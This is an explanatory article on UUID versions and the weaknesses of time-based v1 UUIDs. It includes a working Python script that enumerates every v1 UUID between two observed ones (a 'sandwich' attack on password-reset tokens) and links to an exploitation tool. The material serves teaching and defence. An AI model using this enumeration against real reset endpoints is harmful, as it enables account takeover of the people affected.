What is a UUID?

A UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify objects or information in a distributed system without a central authority handing out identifiers. It is also known as a GUID (Globally Unique Identifier), mainly in Microsoft contexts. The format is standardised in RFC 4122 and is widely used in software development for database keys, session and reset tokens, file and object names, and component identifiers.

Structure of a UUID

A UUID consists of 32 hexadecimal digits, displayed in five groups separated by hyphens, in the form of 8-4-4-4-12. For example:

123e4567-e89b-12d3-a456-426614174000

The version can be determined from the first hex digit of the third group (12d3 --> version 1, 42d3 --> version 4). The first hex digit of the fourth group carries the variant; for RFC 4122 UUIDs it is 8, 9, a or b. Version 1 is time based (timestamp + clock sequence + node/MAC address), version 4 is random, so the version digit tells you whether the identifier is worth attacking at all.

Vulnerabilities of UUID1

  1. Predictability:

    • A UUID1 is built from a 60-bit timestamp (100 ns ticks since 1582-10-15), a 14-bit clock sequence and a 48-bit node identifier (normally the MAC address). The clock sequence and node rarely change between calls on the same host, so once an attacker has seen one UUID from a generator the only unknown in every other UUID it produces is the timestamp. If the attacker knows or can bound the time at which a target UUID was generated (for example by requesting their own UUIDs just before and just after the victim's password-reset token was issued), the candidate set shrinks to the ticks in that window, roughly 10^7 per second, which is trivial to enumerate and test.
  2. MAC Address Exposure:

    • UUID1 embeds the MAC address of the machine that generated it in its last group, which exposes the hardware address of the host. This information can be used for targeted attacks, network mapping, fingerprinting the vendor via the OUI, or correlating identifiers back to one machine across different networks. Implementations that cannot read a MAC address are required to use a random node with the multicast bit set instead, so a node with that bit set is not a real hardware address.
  3. Potential for Collisions:

    • While UUID1 is designed to be unique, two generators that share the same node and clock sequence and produce a UUID in the same 100 ns tick will emit the same value. The clock sequence exists to cover clock regressions on a single host, but it does not help when the node itself is duplicated, which happens with cloned virtual machines or containers that share a MAC address, or when several processes on one host generate UUIDs without coordinating. The risk is low in practice, but it is not zero, and an attacker who can influence timing can raise it.
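The following Python script is an added example, not part of the original page and not the tool linked below. It decodes the fields described above (version, variant, timestamp, clock sequence, node) from any UUID using only the standard library, rebuilds a version-1 UUID from raw fields, and then performs the "sandwich" enumeration from point 1: given two UUIDs the attacker obtained before and after the victim's, it yields every UUID the same generator could have produced in between. The node, clock sequence and timestamps in the demo are constructed values, not data from any real system.

```python
import uuid
from datetime import datetime, timedelta, timezone

# UUIDv1 timestamps count 100 ns intervals since the Gregorian reform date.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def describe(u: uuid.UUID) -> dict:
    """Decode a UUID; the v1-only fields are filled in only when version == 1."""
    info = {"version": u.version, "variant": u.variant}
    if u.version == 1:
        # Integer division keeps full precision; sub-microsecond ticks are dropped.
        info["timestamp"] = GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10)
        info["clock_seq"] = u.clock_seq
        info["node"] = "%012x" % u.node
        # RFC 4122: a node that is not a real MAC must have the multicast bit
        # (least significant bit of the first octet, bit 40 of the 48) set.
        info["multicast_node"] = bool((u.node >> 40) & 1)
    return info


def make_v1(timestamp: int, clock_seq: int, node: int) -> uuid.UUID:
    """Build a version-1 UUID from raw fields (inverse of describe())."""
    time_low = timestamp & 0xFFFFFFFF
    time_mid = (timestamp >> 32) & 0xFFFF
    time_hi_version = ((timestamp >> 48) & 0x0FFF) | (1 << 12)   # version 1
    clock_seq_hi_variant = ((clock_seq >> 8) & 0x3F) | 0x80      # RFC 4122 variant
    clock_seq_low = clock_seq & 0xFF
    return uuid.UUID(fields=(time_low, time_mid, time_hi_version,
                             clock_seq_hi_variant, clock_seq_low, node))


def sandwich(before: uuid.UUID, after: uuid.UUID):
    """Yield every v1 UUID the same generator could have issued strictly between
    two observed UUIDs. Requires both to be v1 and to share node and clock_seq,
    otherwise the window is not bounded by a single generator state."""
    if before.version != 1 or after.version != 1:
        raise ValueError("sandwich attack needs two version-1 UUIDs")
    if before.node != after.node or before.clock_seq != after.clock_seq:
        raise ValueError("node or clock_seq differ: not one generator run, window not closed")
    lo, hi = sorted((before.time, after.time))
    for t in range(lo + 1, hi):
        yield make_v1(t, before.clock_seq, before.node)


if __name__ == "__main__":
    # Constructed scenario: the attacker requests a token before and after the
    # victim's reset token; all three come from one generator (same node, clock_seq).
    node, clock_seq = 0x001122334455, 0x1234          # hypothetical values
    base = 139233600000000000                           # 2024-01-01T00:00:00Z in 100 ns ticks
    attacker_before = make_v1(base, clock_seq, node)
    victim = make_v1(base + 17, clock_seq, node)        # unknown to the attacker
    attacker_after = make_v1(base + 40, clock_seq, node)

    print("before:", attacker_before, describe(attacker_before))
    candidates = list(sandwich(attacker_before, attacker_after))
    print(len(candidates), "candidates in the window; victim found:", victim in candidates)
```

The window here is 40 ticks (4 microseconds) so the demo finishes instantly; a real gap of one second between the attacker's two requests yields about ten million candidates, which is still a feasible brute force against a reset endpoint without rate limiting. The check on node and clock sequence matters: some generators re-randomise the 14-bit clock sequence on every call, which multiplies the search space by 2^14 and is one reason the attack works against some stacks and not others.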

Exploitation tool

https://github.com/Lupin-Holmes/sandwich